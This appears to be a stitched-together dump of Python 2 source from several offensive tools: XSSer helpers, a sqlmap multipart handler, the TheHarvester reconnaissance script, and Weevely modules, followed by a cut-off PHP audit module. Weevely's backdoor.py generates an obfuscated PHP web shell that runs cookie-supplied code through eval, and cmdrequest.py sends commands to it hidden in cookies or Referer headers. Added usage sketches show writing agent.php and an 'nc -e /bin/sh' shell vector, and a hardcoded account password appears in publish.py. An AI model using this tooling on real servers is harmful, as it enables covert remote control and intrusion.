c = pycurl.Curl()
if self._method == 'post':
c.setopt(c.POST, 1)
c.setopt(c.POSTFIELDS, dest)
target = self._url
else:
target = self._url + '?' + dest
c.setopt(c.URL, target)
c.setopt(c.FOLLOWLOCATION, 1)
c.setopt(c.WRITEFUNCTION, out.write)
c.perform()
c.close()
soup = BeautifulSoup(out.getvalue())
if self._service == 'tinyurl':
return soup.findAll('blockquote')[1].findAll('a')[0]['href']
elif self._service == 'is.gd':
return soup.findAll('input', {'id':'short_url'})[0]['value']
if __name__ == "__main__":
shortener = ShortURLReservations('tinyurl')
print shortener.process_url('http://slashdot.org?foo')
shortener = ShortURLReservations('is.gd')
print shortener.process_url('http://slashdot.org?foo')
```
#### File: xsser/XSSer/publish.py
```python
import urllib2, urllib
class publisher(object):
def __init__(self, xsser):
# initialize main XSSer
self.instance = xsser
def send_to_identica(self, msg, username, password, url=None):
if url is None:
url = "http://identi.ca/api/statuses/update.xml"
data = urllib.urlencode({'status':msg})
passman = urllib2.HTTPPasswordMgrWithDefaultRealm()
passman.add_password(None, url, username, password)
authhandler = urllib2.HTTPBasicAuthHandler(passman)
opener = urllib2.build_opener(authhandler)
urllib2.install_opener(opener)
pagehandle = urllib2.urlopen(url, data)
print pagehandle
if __name__ == "__main__":
publish = publisher(object)
publish.send_to_identica('XSSer v1.6b -Grey Swarm!- Website: http://xsser.sf.net', 'xsserbot01', '8vnVw8wvs', 'http://identi.ca/api/statuses/update.xml')
```
#### File: xsser/XSSer/reporter.py
```python
"""
Base class for objects wanting to receive report information from XSSer.
It implements all callbacks so you will be safe ;)
"""
class XSSerReporter(object):
def start_attack(self):
pass
def end_attack(self):
pass
def mosquito_crashed(self, dest_url, reason="unknown"):
pass
def report_state(self, state):
pass
def add_link(self, orig_url, dest_url):
pass
def report_error(self, error_msg):
pass
def start_token_check(self, dest_url):
pass
def start_crawl(self, dest_url):
pass
def post(self, msg):
pass
def token_arrived(self, token):
pass
def add_checked(self, dest_url):
pass
def add_success(self, dest_url):
pass
def add_failure(self, dest_url):
pass
```
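Since every callback on `XSSerReporter` is a no-op, a custom reporter only has to override the events it cares about. Below is a minimal sketch assuming the import path follows the file layout above; how such a reporter gets attached to a running XSSer instance is not shown here.
```python
# Minimal sketch of a custom reporter; import path assumed from the layout above.
from XSSer.reporter import XSSerReporter

class ConsoleReporter(XSSerReporter):
    """Print only the events we care about; everything else stays a no-op."""

    def start_attack(self):
        print "[reporter] attack started"

    def add_success(self, dest_url):
        print "[reporter] vulnerable:", dest_url

    def add_failure(self, dest_url):
        print "[reporter] not vulnerable:", dest_url

    def report_error(self, error_msg):
        print "[reporter] error:", error_msg
```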
#### File: thirdparty/multipart/multipartpost.py
```python
import mimetools
import mimetypes
import os
import stat
import StringIO
import sys
import urllib
import urllib2
from lib.core.exception import SqlmapDataException
class Callable:
def __init__(self, anycallable):
self.__call__ = anycallable
# Controls how sequences are uncoded. If true, elements may be given
# multiple values by assigning a sequence.
doseq = 1
class MultipartPostHandler(urllib2.BaseHandler):
handler_order = urllib2.HTTPHandler.handler_order - 10 # needs to run first
def http_request(self, request):
data = request.get_data()
if data is not None and type(data) != str:
v_files = []
v_vars = []
try:
for(key, value) in data.items():
if isinstance(value, file) or hasattr(value, 'file') or isinstance(value, StringIO.StringIO):
v_files.append((key, value))
else:
v_vars.append((key, value))
except TypeError:
systype, value, traceback = sys.exc_info()
raise SqlmapDataException, "not a valid non-string sequence or mapping object", traceback
if len(v_files) == 0:
data = urllib.urlencode(v_vars, doseq)
else:
boundary, data = self.multipart_encode(v_vars, v_files)
contenttype = 'multipart/form-data; boundary=%s' % boundary
#if (request.has_header('Content-Type') and request.get_header('Content-Type').find('multipart/form-data') != 0):
# print "Replacing %s with %s" % (request.get_header('content-type'), 'multipart/form-data')
request.add_unredirected_header('Content-Type', contenttype)
request.add_data(data)
return request
def multipart_encode(vars, files, boundary=None, buf=None):
if boundary is None:
boundary = mimetools.choose_boundary()
if buf is None:
buf = ''
for (key, value) in vars:
if key is not None and value is not None:
buf += '--%s\r\n' % boundary
buf += 'Content-Disposition: form-data; name="%s"' % key
buf += '\r\n\r\n' + value + '\r\n'
for (key, fd) in files:
file_size = os.fstat(fd.fileno())[stat.ST_SIZE] if isinstance(fd, file) else fd.len
filename = fd.name.split('/')[-1] if '/' in fd.name else fd.name.split('\\')[-1]
try:
contenttype = mimetypes.guess_type(filename)[0] or 'application/octet-stream'
except:
# Reference: http://bugs.python.org/issue9291
contenttype = 'application/octet-stream'
buf += '--%s\r\n' % boundary
buf += 'Content-Disposition: form-data; name="%s"; filename="%s"\r\n' % (key, filename)
buf += 'Content-Type: %s\r\n' % contenttype
# buf += 'Content-Length: %s\r\n' % file_size
fd.seek(0)
buf = str(buf) if not isinstance(buf, unicode) else buf.encode("utf8")
buf += '\r\n%s\r\n' % fd.read()
buf += '--%s--\r\n\r\n' % boundary
return boundary, buf
multipart_encode = Callable(multipart_encode)
https_request = http_request
```
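Because `MultipartPostHandler` is an ordinary `urllib2` handler, using it is just a matter of building an opener with it and posting a dict whose values mix plain strings and file objects. A minimal usage sketch follows; the URL, field names and import path are assumptions, not part of the original module.
```python
import urllib2

# Import path assumed from the file layout above.
from thirdparty.multipart.multipartpost import MultipartPostHandler

# An opener with this handler encodes dict data as multipart/form-data
# whenever at least one value is a file-like object.
opener = urllib2.build_opener(MultipartPostHandler)

params = {
    "description": "test upload",           # plain form field
    "datafile": open("example.bin", "rb"),  # file field triggers multipart encoding
}

# Placeholder endpoint; any URL accepting multipart POST requests would do.
response = opener.open("http://example.com/upload", params)
print response.read()
```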
#### File: TheHarvester/discovery/pgpsearch.py
```python
import string
import httplib
import sys
import myparser
class search_pgp:
def __init__(self, word):
self.word = word
self.results = ""
self.server = "pgp.rediris.es:11371"
self.hostname = "pgp.rediris.es"
self.userAgent = "(Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6"
def process(self):
h = httplib.HTTP(self.server)
h.putrequest('GET', "/pks/lookup?search=" + self.word + "&op=index")
h.putheader('Host', self.hostname)
h.putheader('User-agent', self.userAgent)
h.endheaders()
returncode, returnmsg, headers = h.getreply()
self.results = h.getfile().read()
def get_emails(self):
rawres = myparser.parser(self.results, self.word)
return rawres.emails()
def get_hostnames(self):
rawres = myparser.parser(self.results, self.word)
return rawres.hostnames()
```
#### File: Dangerous/TheHarvester/theHarvester.py
```python
import string
import httplib
import sys
import os
from socket import *
import re
import getopt
try:
import requests
except:
print "Request library not found, please install it before proceeding\n"
sys.exit()
from discovery import *
from lib import htmlExport
from lib import hostchecker
print "\n*******************************************************************"
print "* *"
print "* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *"
print "* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *"
print "* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *"
print "* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *"
print "* *"
print "* TheHarvester Ver. 2.6 *"
print "* Coded by <NAME> *"
print "* Edge-Security Research *"
print "* <EMAIL> *"
print "*******************************************************************\n\n"
def usage():
comm = os.path.basename(sys.argv[0])
if os.path.dirname(sys.argv[0]) == os.getcwd():
comm = "./" + comm
print "Usage: theharvester options \n"
print " -d: Domain to search or company name"
print """ -b: data source: google, googleCSE, bing, bingapi, pgp, linkedin,
google-profiles, jigsaw, twitter, googleplus, all\n"""
print " -s: Start in result number X (default: 0)"
print " -v: Verify host name via dns resolution and search for virtual hosts"
print " -f: Save the results into an HTML and XML file"
print " -n: Perform a DNS reverse query on all ranges discovered"
print " -c: Perform a DNS brute force for the domain name"
print " -t: Perform a DNS TLD expansion discovery"
print " -e: Use this DNS server"
print " -l: Limit the number of results to work with(bing goes from 50 to 50 results,"
print " google 100 to 100, and pgp doesn't use this option)"
print " -h: use SHODAN database to query discovered hosts"
print "\nExamples:"
print " " + comm + " -d microsoft.com -l 500 -b google"
print " " + comm + " -d microsoft.com -b pgp"
print " " + comm + " -d microsoft -l 200 -b linkedin"
print " " + comm + " -d apple.com -b googleCSE -l 500 -s 300\n"
def start(argv):
if len(sys.argv) < 4:
usage()
sys.exit()
try:
opts, args = getopt.getopt(argv, "l:d:b:s:vf:nhcte:")
except getopt.GetoptError:
usage()
sys.exit()
start = 0
host_ip = []
filename = ""
bingapi = "yes"
dnslookup = False
dnsbrute = False
dnstld = False
shodan = False
vhost = []
virtual = False
limit = 100
dnsserver = ""
for opt, arg in opts:
if opt == '-l':
limit = int(arg)
elif opt == '-d':
word = arg
elif opt == '-s':
start = int(arg)
elif opt == '-v':
virtual = "basic"
elif opt == '-f':
filename = arg
elif opt == '-n':
dnslookup = True
elif opt == '-c':
dnsbrute = True
elif opt == '-h':
shodan = True
elif opt == '-e':
dnsserver = arg
elif opt == '-t':
dnstld = True
elif opt == '-b':
engine = arg
if engine not in ("google","googleCSE" , "linkedin", "pgp", "all", "google-profiles", "bing", "bingapi",
"yandex", "jigsaw", "dogpilesearch", "twitter", "googleplus", "yahoo", "baidu"):
usage()
print "Invalid search engine, try with: bing, google, linkedin, pgp, jigsaw, bingapi, google-profiles, dogpilesearch, twitter, googleplus, yahoo, baidu"
sys.exit()
else:
pass
if engine == "google":
print "[-] Searching in Google:"
search = googlesearch.search_google(word, limit, start)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
if engine == "googleCSE":
print "[-] Searching in Google Custom Search:"
search = googleCSE.search_googleCSE(word, limit, start)
search.process()
search.store_results()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
if engine == "exalead":
print "[-] Searching in Exalead:"
search = exaleadsearch.search_exalead(word, limit, start)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "bing" or engine == "bingapi":
print "[-] Searching in Bing:"
search = bingsearch.search_bing(word, limit, start)
if engine == "bingapi":
bingapi = "yes"
else:
bingapi = "no"
search.process(bingapi)
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "yandex": # Not working yet
print "[-] Searching in Yandex:"
search = yandexsearch.search_yandex(word, limit, start)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "pgp":
print "[-] Searching in PGP key server.."
search = pgpsearch.search_pgp(word)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "jigsaw":
print "[-] Searching in Jigsaw.."
search = jigsaw.search_jigsaw(word, limit)
search.process()
people = search.get_people()
print "Users from Jigsaw:"
print "====================="
for user in people:
print user
sys.exit()
elif engine == "dogpilesearch":
print "[-] Searching in Dogpilesearch.."
search = dogpilesearch.search_dogpile(word, limit)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "yahoo":
print "[-] Searching in Yahoo.."
search = yahoosearch.search_yahoo(word, limit)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "baidu":
print "[-] Searching in Baidu.."
search = baidusearch.search_baidu(word, limit)
search.process()
all_emails = search.get_emails()
all_hosts = search.get_hostnames()
elif engine == "googleplus":
print "[-] Searching in Google+ .."
search = googleplussearch.search_googleplus(word, limit)
search.process()
people = search.get_people()
print "Users from Google+:"
print "===================="
for user in people:
print user
sys.exit()
elif engine == "twitter":
print "[-] Searching in Twitter .."
search = twittersearch.search_twitter(word, limit)
search.process()
people = search.get_people()
print "Users from Twitter:"
print "===================="
for user in people:
print user
sys.exit()
elif engine == "linkedin":
print "[-] Searching in Linkedin.."
search = linkedinsearch.search_linkedin(word, limit)
search.process()
people = search.get_people()
print "Users from Linkedin:"
print "===================="
for user in people:
print user
sys.exit()
elif engine == "google-profiles":
print "[-] Searching in Google profiles.."
search = googlesearch.search_google(word, limit, start)
search.process_profiles()
people = search.get_profiles()
print "Users from Google profiles:"
print "---------------------------"
for users in people:
print users
sys.exit()
elif engine == "all":
print "Full harvest.."
all_emails = []
all_hosts = []
virtual = "basic"
print "[-] Searching in Google.."
search = googlesearch.search_google(word, limit, start)
search.process()
emails = search.get_emails()
hosts = search.get_hostnames()
all_emails.extend(emails)
all_hosts.extend(hosts)
print "[-] Searching in PGP Key server.."
search = pgpsearch.search_pgp(word)
search.process()
emails = search.get_emails()
hosts = search.get_hostnames()
all_hosts.extend(hosts)
all_emails.extend(emails)
print "[-] Searching in Bing.."
bingapi = "no"
search = bingsearch.search_bing(word, limit, start)
search.process(bingapi)
emails = search.get_emails()
hosts = search.get_hostnames()
all_hosts.extend(hosts)
all_emails.extend(emails)
print "[-] Searching in Exalead.."
search = exaleadsearch.search_exalead(word, limit, start)
search.process()
emails = search.get_emails()
hosts = search.get_hostnames()
all_hosts.extend(hosts)
all_emails.extend(emails)
#Results############################################################
print "\n\n[+] Emails found:"
print "------------------"
if all_emails == []:
print "No emails found"
else:
for emails in all_emails:
print emails
print "\n[+] Hosts found in search engines:"
print "------------------------------------"
if all_hosts == []:
print "No hosts found"
else:
print "[-] Resolving hostnames IPs... "
full_host = hostchecker.Checker(all_hosts)
full = full_host.check()
for host in full:
ip = host.split(':')[0]
print host
if host_ip.count(ip.lower()):
pass
else:
host_ip.append(ip.lower())
#DNS reverse lookup#################################################
dnsrev = []
if dnslookup == True:
print "\n[+] Starting active queries:"
analyzed_ranges = []
for x in full:
ip = x.split(":")[0]
range = ip.split(".")
range[3] = "0/24"
range = string.join(range, '.')
if not analyzed_ranges.count(range):
print "[-]Performing reverse lookup in :" + range
a = dnssearch.dns_reverse(range, True)
a.list()
res = a.process()
analyzed_ranges.append(range)
else:
continue
for x in res:
if x.count(word):
dnsrev.append(x)
if x not in full:
full.append(x)
print "Hosts found after reverse lookup:"
print "---------------------------------"
for xh in dnsrev:
print xh
#DNS Brute force####################################################
dnsres = []
if dnsbrute == True:
print "\n[-] Starting DNS brute force:"
a = dnssearch.dns_force(word, dnsserver, verbose=True)
res = a.process()
print "\n[+] Hosts found after DNS brute force:\n"
for y in res:
print y
dnsres.append(y)
if y not in full:
full.append(y)
#DNS TLD expansion###################################################
dnstldres = []
if dnstld == True:
print "[-] Starting DNS TLD expansion:"
a = dnssearch.dns_tld(word, dnsserver, verbose=True)
res = a.process()
print "\n[+] Hosts found after DNS TLD expansion:"
print "=========================================="
for y in res:
print y
dnstldres.append(y)
if y not in full:
full.append(y)
#Virtual hosts search###############################################
if virtual == "basic":
print "[+] Virtual hosts:"
print "=================="
for l in host_ip:
search = bingsearch.search_bing(l, limit, start)
search.process_vhost()
res = search.get_allhostnames()
for x in res:
x = re.sub(r'[[\<\/?]*[\w]*>]*','',x)
x = re.sub('<','',x)
x = re.sub('>','',x)
print l + "\t" + x
vhost.append(l + ":" + x)
full.append(l + ":" + x)
else:
pass
shodanres = []
shodanvisited = []
if shodan == True:
print "[+] Shodan Database search:"
for x in full:
print x
try:
ip = x.split(":")[0]
if not shodanvisited.count(ip):
print "\tSearching for: " + x
a = shodansearch.search_shodan(ip)
shodanvisited.append(ip)
results = a.run()
for res in results:
shodanres.append(
x + "SAPO" + str(res['banner']) + "SAPO" + str(res['port']))
except:
pass
print "[+] Shodan results:"
print "==================="
for x in shodanres:
print x.split("SAPO")[0] + ":" + x.split("SAPO")[1]
else:
pass
###################################################################
# Here I need to add explosion mode.
# I need to extract the TLDs to do this.
recursion = None
if recursion:
start = 0
for word in vhost:
search = googlesearch.search_google(word, limit, start)
search.process()
emails = search.get_emails()
hosts = search.get_hostnames()
print emails
print hosts
else:
pass
if filename != "":
try:
print "[+] Saving files..."
html = htmlExport.htmlExport(
all_emails,
full,
vhost,
dnsres,
dnsrev,
filename,
word,
shodanres,
dnstldres)
save = html.writehtml()
except Exception as e:
print e
print "Error creating the file"
try:
filename = filename.split(".")[0] + ".xml"
file = open(filename, 'w')
file.write('<?xml version="1.0" encoding="UTF-8"?><theHarvester>')
for x in all_emails:
file.write('<email>' + x + '</email>')
for x in all_hosts:
file.write('<host>' + x + '</host>')
for x in vhost:
file.write('<vhost>' + x + '</vhost>')
file.write('</theHarvester>')
file.flush()
file.close()
print "Files saved!"
except Exception as er:
print "Error saving XML file: " + er
sys.exit()
if __name__ == "__main__":
try:
start(sys.argv[1:])
except KeyboardInterrupt:
print "Search interrupted by user.."
except:
sys.exit()
```
#### File: Weevely/core/backdoor.py
```python
import base64, codecs
from random import random, randrange, choice, shuffle
from pollution import pollute_with_static_str
from core.utils import randstr
from core.moduleexception import ModuleException
from string import Template, ascii_letters, digits
PERMITTED_CHARS = ascii_letters + digits + '_.~'
WARN_SHORT_PWD = 'Invalid password, use words longer than 3 characters'
WARN_CHARS = 'Invalid password, password permitted chars are \'%s\'' % PERMITTED_CHARS
class BdTemplate(Template):
delimiter = '%'
class Backdoor:
payload_template= """
$c='count';
$a=$_COOKIE;
if(reset($a)=='%STARTKEY' && $c($a)>3){
$k='%ENDKEY';
echo '<'.$k.'>';
eval(base64_decode(preg_replace(array('/[^\w=\s]/','/\s/'), array('','+'), join(array_slice($a,$c($a)-3)))));
echo '</'.$k.'>';
}
"""
backdoor_template = """<?php
$%PAY_VAR1="%PAY1";
$%PAY_VAR2="%PAY2";
$%PAY_VAR3="%PAY3";
$%PAY_VAR4="%PAY4";
$%REPL_FUNC = str_replace("%REPL_POLL","","%REPL_ENC");
$%B64_FUNC = $%REPL_FUNC("%B64_POLL", "", "%B64_ENC");
$%CREAT_FUNC = $%REPL_FUNC("%CREAT_POLL","","%CREAT_ENC");
$%FINAL_FUNC = $%CREAT_FUNC('', $%B64_FUNC($%REPL_FUNC("%PAY_POLL", "", $%PAY_VAR1.$%PAY_VAR2.$%PAY_VAR3.$%PAY_VAR4))); $%FINAL_FUNC();
?>"""
def __init__( self, password ):
self.__check_pwd(password)
self.password = password
self.start_key = self.password[:2]
self.end_key = self.password[2:]
self.payload = BdTemplate(self.payload_template).substitute(STARTKEY = self.start_key, ENDKEY = self.end_key).replace( '\n', '' )
self.backdoor = self.encode_template()
def __str__( self ):
return self.backdoor
def __check_pwd(self, password):
if len(password)<4:
raise ModuleException('generate','\'%s\' %s' % (password, WARN_SHORT_PWD))
if ''.join(c for c in password if c not in PERMITTED_CHARS):
raise ModuleException('generate','\'%s\' %s' % (password, WARN_CHARS))
def encode_template(self):
b64_new_func_name = randstr()
b64_pollution, b64_polluted = pollute_with_static_str('base64_decode',frequency=0.7)
createfunc_name = randstr()
createfunc_pollution, createfunc_polluted = pollute_with_static_str('create_function',frequency=0.7)
payload_var = [ randstr() for st in range(4) ]
payload_pollution, payload_polluted = pollute_with_static_str(base64.b64encode(self.payload))
replace_new_func_name = randstr()
repl_pollution, repl_polluted = pollute_with_static_str('str_replace',frequency=0.7)
final_func_name = randstr()
length = len(payload_polluted)
offset = 7
piece1 = length / 4 + randrange(-offset,+offset)
piece2 = length / 2 + randrange(-offset,+offset)
piece3 = length*3/4 + randrange(-offset,+offset)
ts_splitted = self.backdoor_template.splitlines()
ts_shuffled = ts_splitted[1:6]
shuffle(ts_shuffled)
ts_splitted = [ts_splitted[0]] + ts_shuffled + ts_splitted[6:]
self.backdoor_template = '\n'.join(ts_splitted)
return BdTemplate(self.backdoor_template).substitute(
B64_FUNC = b64_new_func_name,
B64_ENC = b64_polluted,
B64_POLL = b64_pollution,
CREAT_FUNC = createfunc_name,
CREAT_ENC = createfunc_polluted,
CREAT_POLL = createfunc_pollution,
REPL_FUNC = replace_new_func_name,
REPL_ENC = repl_polluted,
REPL_POLL = repl_pollution,
PAY_VAR1 = payload_var[0],
PAY_VAR2 = payload_var[1],
PAY_VAR3 = payload_var[2],
PAY_VAR4 = payload_var[3],
PAY_POLL = payload_pollution,
PAY1 = payload_polluted[:piece1],
PAY2 = payload_polluted[piece1:piece2],
PAY3 = payload_polluted[piece2:piece3],
PAY4 = payload_polluted[piece3:],
FINAL_FUNC = final_func_name)
```
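`Backdoor` is self-contained: the first two characters of the password become the start key, the rest become the tag that frames command output, and `str()` on the object yields the obfuscated PHP agent. A minimal generation sketch, with the import paths assumed from the Weevely layout above:
```python
# Import paths assumed from the Weevely layout shown above.
from core.backdoor import Backdoor
from core.moduleexception import ModuleException

try:
    # Password must be longer than 3 chars and use only PERMITTED_CHARS;
    # 's3' becomes the start key and 'cr3t' the output-framing tag.
    agent = Backdoor("s3cr3t")
    php_source = str(agent)            # obfuscated PHP agent, ready to upload
    open("agent.php", "w").write(php_source)
except ModuleException, e:
    print "password rejected:", e
```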
#### File: Weevely/core/configs.py
```python
import os
import sys
import core.terminal
import atexit
try:
import readline
except ImportError:
try:
import pyreadline as readline
except ImportError:
print '[!] Error, readline or pyreadline python module required. In Ubuntu linux run\n[!] sudo apt-get install python-readline'
sys.exit(1)
dirpath = '.weevely'
rcfilepath = 'weevely.rc'
historyfilepath = 'weevely_history'
class Configs:
def _read_rc(self, rcpath):
try:
rcfile = open(rcpath, 'r')
except Exception, e:
self._tprint( "[!] Error opening '%s' file." % rcpath)
else:
return [c.strip() for c in rcfile.read().split('\n') if c.strip() and c[0] != '#']
return []
def _historyfile(self):
return os.path.join(self.dirpath, historyfilepath)
def _make_home_folder(self):
self.dirpath = os.path.join(os.path.expanduser('~'),dirpath)
if not os.path.exists(self.dirpath):
os.mkdir(self.dirpath)
def _init_completion(self):
self.historyfile = self._historyfile()
self.matching_words = [':%s' % m for m in self.modhandler.modules_classes.keys()] + [core.terminal.help_string, core.terminal.load_string, core.terminal.set_string]
try:
readline.set_history_length(100)
readline.set_completer_delims(' \t\n;')
readline.parse_and_bind( 'tab: complete' )
readline.set_completer( self._complete )
readline.read_history_file( self.historyfile )
except IOError:
pass
atexit.register( readline.write_history_file, self.historyfile )
def _complete(self, text, state):
"""Generic readline completion entry point."""
try:
buffer = readline.get_line_buffer()
line = readline.get_line_buffer().split()
if ' ' in buffer:
return []
# show all commandspath
if not line:
all_cmnds = [c + ' ' for c in self.matching_words]
if len(all_cmnds) > state:
return all_cmnds[state]
else:
return []
cmd = line[0].strip()
if cmd in self.matching_words:
return [cmd + ' '][state]
results = [c + ' ' for c in self.matching_words if c.startswith(cmd)] + [None]
if len(results) == 2:
if results[state]:
return results[state].split()[0] + ' '
else:
return []
return results[state]
except Exception, e:
self._tprint('[!] Completion error: %s' % e)
```
#### File: core/http/cmdrequest.py
```python
import urllib2, urlparse, re, base64
from request import Request
from random import random, shuffle
from string import letters, digits
from core.pollution import pollute_with_random_str
from core.utils import randstr
default_prefixes = [ "ID", "SID", "APISID", "USRID", "SESSID", "SESS", "SSID", "USR", "PREF" ]
shuffle(default_prefixes)
class CmdRequest(Request):
def __init__( self, url, password, proxy = None ):
Request.__init__( self, url, proxy)
self.password = password
self.extractor = re.compile( "<%s>(.*)</%s>" % ( self.password[2:], self.password[2:] ), re.DOTALL )
# self.extractor_debug = re.compile( "<%sDEBUG>(.*)</%sDEBUG>" % ( self.password[2:], self.password[2:] ), re.DOTALL )
self.parsed = urlparse.urlparse(self.url)
self.data = None
if not self.parsed.path:
self.query = self.parsed.netloc.replace( '/', ' ' )
else:
self.query = ''.join( self.parsed.path.split('.')[:-1] ).replace( '/', ' ' )
def setPayload( self, payload, mode):
payload = base64.b64encode( payload.strip() )
length = len(payload)
third = length / 3
thirds = third * 2
if mode == 'Referer':
referer = "http://www.google.com/url?sa=%s&source=web&ct=7&url=%s&rct=j&q=%s&ei=%s&usg=%s&sig2=%s" % ( self.password[:2], \
urllib2.quote( self.url ), \
self.query.strip(), \
payload[:third], \
payload[third:thirds], \
payload[thirds:] )
self['Referer'] = referer
else: # mode == 'Cookie' or unset
prefixes = default_prefixes[:]
rand_cookie = ''
rand_cookie += prefixes.pop() + '=' + self.password[:2] + '; '
while len(prefixes)>3:
if random()>0.5:
break
rand_cookie += prefixes.pop() + '=' + randstr(16, False, letters + digits) + '; '
# DO NOT fuzz with %, _ (\w on regexp keep _)
payload = pollute_with_random_str(payload, '#&*-/?@~')
rand_cookie += prefixes.pop() + '=' + payload[:third] + '; '
rand_cookie += prefixes.pop() + '=' + payload[third:thirds] + '; '
rand_cookie += prefixes.pop() + '=' + payload[thirds:]
self['Cookie'] = rand_cookie
def setPostData(self, data_dict):
self.data = data_dict.copy()
def execute( self , bytes = -1):
response = self.read()
# print self.extractor_debug.findall(response)
data = self.extractor.findall(response)
if len(data) < 1 or not data:
raise NoDataException()
else:
return data[0].strip()
class NoDataException(Exception):
pass
```
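`CmdRequest` is the client-side counterpart of the agent above: the same password yields the first cookie marker (`s3`) and the `<cr3t>...</cr3t>` frame that `execute()` extracts from the response. A minimal sketch; the target URL and import path are assumptions:
```python
# Import path assumed from the Weevely layout shown above.
from core.http.cmdrequest import CmdRequest, NoDataException

# URL of an installed agent (placeholder) and the password used to generate it.
req = CmdRequest("http://example.com/agent.php", "s3cr3t")

# The PHP payload is base64-encoded and split across three cookie values
# (or hidden inside a crafted Referer header when mode='Referer').
req.setPayload("print(get_current_user());", mode="Cookie")

try:
    print req.execute()   # text framed by <cr3t>...</cr3t> in the response
except NoDataException:
    print "no framed output (wrong password or agent not reachable?)"
```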
#### File: Weevely/core/vector.py
```python
from core.moduleexception import ModuleException
from string import Template
from types import ListType, StringTypes, DictType
import thread
import collections
class VectorsDict(collections.OrderedDict):
def __init__(self, modhandler, *args):
self.modhandler = modhandler
collections.OrderedDict.__init__(self, args)
def add_vector(self, name, interpreter, payloads):
self[name] = Vector(self.modhandler, name, interpreter, payloads)
def get(self, name):
return self[name]
class Vector:
def __init__(self, modhandler, name, interpreter, payloads):
self.modhandler = modhandler
self.name = name
self.interpreter = interpreter
# Payloads and Formats are lists
self.payloads = []
if payloads and isinstance(payloads, ListType):
self.payloads = payloads
elif payloads and isinstance (payloads, StringTypes):
self.payloads.append(payloads)
def execute(self, format_list = {}, return_out_res = False):
# Check type dict
if not isinstance(format_list, DictType):
raise Exception("[!][%s] Error, format vector type is not dict: '%s'" % (self.name, format_list))
formatted_list = []
format_template_list = format_list.keys()
for payload in self.payloads:
# Search format keys present in current payload part
list_of_key_formats_in_payload = [s for s in format_template_list if '$%s' % s in payload]
# Extract from format dict just the ones for current payload part
dict_of_formats_in_payload = {}
for k, v in format_list.iteritems():
if k in list_of_key_formats_in_payload:
dict_of_formats_in_payload[k]=v
if dict_of_formats_in_payload:
formatted_list.append(Template(payload).safe_substitute(**dict_of_formats_in_payload))
else:
formatted_list.append(payload)
res, out = self.modhandler.load(self.interpreter).run(formatted_list)
if return_out_res:
return out, res
else:
return res
def execute_background(self, format_list = {}):
thread.start_new_thread(self.execute, (format_list,))
```
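A `Vector` is a named list of `string.Template` payloads bound to an interpreter module: `execute()` substitutes only the `$placeholders` that actually occur in each payload piece and passes the result to `modhandler.load(interpreter).run(...)`. The sketch below uses a stub module handler that just echoes its input; the stub is purely illustrative and not part of Weevely:
```python
from core.vector import VectorsDict   # import path assumed from the layout above

# Purely illustrative stand-ins for Weevely's module handler machinery.
class EchoModule(object):
    def run(self, formatted_list):
        # Real interpreter modules return (result, output); mimic that contract.
        return True, ' '.join(formatted_list)

class StubModhandler(object):
    def load(self, interpreter):
        return EchoModule()

vectors = VectorsDict(StubModhandler())
vectors.add_vector('netcat', 'shell.sh', "nc -l -p $port -e $shell")

# Only keys referenced as $key inside the payload are substituted.
out, res = vectors.get('netcat').execute({'port': 8888, 'shell': '/bin/sh'},
                                          return_out_res=True)
print out   # -> nc -l -p 8888 -e /bin/sh
```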
#### File: modules/audit/phpconf.py
```python
from core.module import Module
from core.moduleexception import ProbeException
from core.argparse import ArgumentParser
from ast import literal_eval
from core.utils import chunks
from re import findall
from types import ListType
from core.prettytable import PrettyTable, ALL
import os
MSG_BASEDIR='Your base directory is presently set to $$BASEDIR$$ - PHP scripts will not be able to access the file system outside of this directory.'
ERR_CONFIG_BASEDIR='Enabled base_dir conf '
ERR_CONFIG_BASEDIR_NOT_SET='not restricted '
ERR_CONFIG_BASEDIR_CHDIR='\nchangeable because of \'.\' '
ERR_CONFIG_BASEDIR_SLASH='\nwithout trailing "/" '
ERR_CONFIG_PHPUSER='Root account could be abused'
WARN_CONFIG_PHPUSER_WIN='Ensure that this user is not an administrator'
ERR_FUNCTION_PROFILE='Enabled functs to gather\nPHP configuration'
WARN_FUNCTION_FILES='Enabled functs to access\nto the filesystem'
ERR_FUNCTION_EXECUTE='Enabled functs to execute\ncommands'
ERR_FUNCTION_LOGGING='Enabled functs to tamper\nlog files'
ERR_FUNCTION_DISRUPT='Enabled functs to disrupt\nother process'
ERR_CONFIG_EXECUTE='Enabled confs that allow\ncommand executions'
ERR_CONFIG_ERRORS='Enabled confs that display\ninformation on errors'
WARN_CONFIG_SAFEMODE='Enabled confs that restrict\nfilesystem access and\nsystem command execution'
WARN_SESS_PATH = 'Disabled conf to move session\nfiles into a protected folder'
WARN_CONFIG_UPLOAD='Enabled confs to\nupload files'
ERR_CONFIG_INCLUDES='Enabled confs to allow\nremote files opening'
ERR_CONFIG_PROFILE='Enabled confs to gather\nPHP configuration infos'
ERR_CONFIG_GLOBALS='Enabled conf register_globals\nallows malicious variable manipulation'
WARN_MAGIC_QUOTES='Enabled confs that provide\nineffective SQLi protection'
ERR_SESS_TRANS='Enabled conf to pass\nsession ID via the URL'
insecure_features = """
$insecure_features = array();
$insecure_features['expose_php'] = 'ERR_CONFIG_PROFILE';
$insecure_features['file_uploads'] = 'WARN_CONFIG_UPLOAD';
$insecure_features['register_globals'] = 'ERR_CONFIG_GLOBALS';
$insecure_features['allow_url_fopen'] = 'ERR_CONFIG_INCLUDES';
$insecure_features['display_errors'] = 'ERR_CONFIG_ERRORS';
$insecure_features['enable_dl'] = 'ERR_CONFIG_EXECUTE';
$insecure_features['safe_mode'] = 'WARN_CONFIG_SAFEMODE';
$insecure_features['magic_quotes_gpc'] = 'WARN_MAGIC_QUOTES';
